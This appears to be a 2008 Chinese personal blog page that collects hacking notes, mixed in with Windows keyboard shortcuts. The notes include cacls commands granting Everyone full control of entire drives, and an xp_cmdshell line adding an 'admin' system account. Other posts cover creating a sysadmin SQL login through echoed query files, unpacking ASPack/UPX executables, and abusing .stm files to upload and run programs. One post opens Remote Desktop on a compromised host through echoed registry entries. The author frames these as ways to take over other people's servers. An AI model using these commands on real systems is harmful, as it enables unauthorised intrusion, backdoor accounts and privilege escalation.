爱你无言
百度首页 | 百度空间
 
文章列表
 
2008-07-06 00:22
权限设置
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览
cacls d:\website /g everyone /e /t授与完全控制
cacls d:\website /r everyone /e /t取消完全控制
SA加系统用户
exec master.dbo.xp_cmdshell 'net user admin admin /add'

e
 
2008-07-04 09:21
CTRL+ALT+END 把“任务管理器”抓出来 
CTRL+ALT+BREAK这个就是切换全屏显示。
CTRL+ALT+END 打开“Windows 安全”对话框。

ALT+PAGE UP 从左向右在程序之间切换。

ALT+PAGE DOWN 从右向左在程序之间切换。

ALT+INSERT 按启动顺序来回切换程序。

ALT+HOME 显示“开始”菜单。

CTRL+ALT+BREAK 在窗口(如果适用)和全屏显示之间切换客户端。

ALT+DELETE 显示窗口的弹出
 
2008-07-01 10:40
 
2008-07-01 10:13
此文章是对网上大量同类文章的分析与总结,并结合自己实施过程中的体会综合而成,其中有不少直接引用,没有注意出处,请原作者见谅)

随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序
 
2008-07-01 10:09
这个服务器可以用sql溢出,可惜就是找不到进一步的入侵方法,因而一直也没有拿下来。今天在校盟看到一篇文章,说是在cmd下也可以中入sql账号和密码,方法如下:

echo exec master.dbo.sp_addlogin 'rooto','******' >test.qry
echo exec sp_addsrvrolemember 'rooto','sysadmin' >>test.qry
cmd.exe /c isql -E /U alma
 
2008-06-30 10:42

这些壳也是最常见的壳,用的范围最广的,大家关键在于领会ESP定律的意思,以后活用起来,嘿嘿,Misswe本人脱壳技术也差劲的要死,学习中

关于 ESP 脱壳找 EOP
ESP 定律:就是加载程序后 F8单步运行 第一个变化的 ESP 值,右击寄存器上 ESP 在转存中跟随,在内存地址上 选中前四个,右击,断点,硬件访问,word F9,中断,....返回。
(D 12ffc0 选四个下硬件写入 dword) 我的其它小记

1. Aspcak 方法:
ESP+6175(Sb) POPAD JMP
2. UPX 方法:
S 0000 The First JMP
变种
ESP+S (60E9)

 
2008-06-30 10:33

 
2008-06-30 10:21

Hashq 1.0 beta 是一个基于模板

Hashq 1.0 beta 功能:
基于模板的多网站MD5 批量查询工具

注意:
解压后运行,需要.net framework 2.0

Hashq 1.0 beta 下载地址:

 
2008-06-30 10:19

利用stm来上传,还能执行程序,代码:

说保存为stm或者shtml看看,运行如下:

HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=

 
2008-06-29 18:56
今天介绍的这种开终端的方法,绿色,环保,无污染~~
不须上传任何文件开启终端的方法适合win2k,xp,2003.
本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~
在无须传任何文件的情况下开启终端服务。

一、win 2k下终端开启终端
首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:

echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curre
 
     
 
 
日历
 
     
 
个人档案
 
willweiwei1

上次登录:
7月 7日
加为好友
 
   
 
文章分类
 
 
 
 
 
 
(1)
 
 
     
 
最近访客
 
 

akunkeji

huneybackf

韩莹冉

chinazhsj

迷迭忘川

a339045649

狂暴中被狙

leguanyuan
     
 
背景音乐
 
 
其它
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2008 Baidu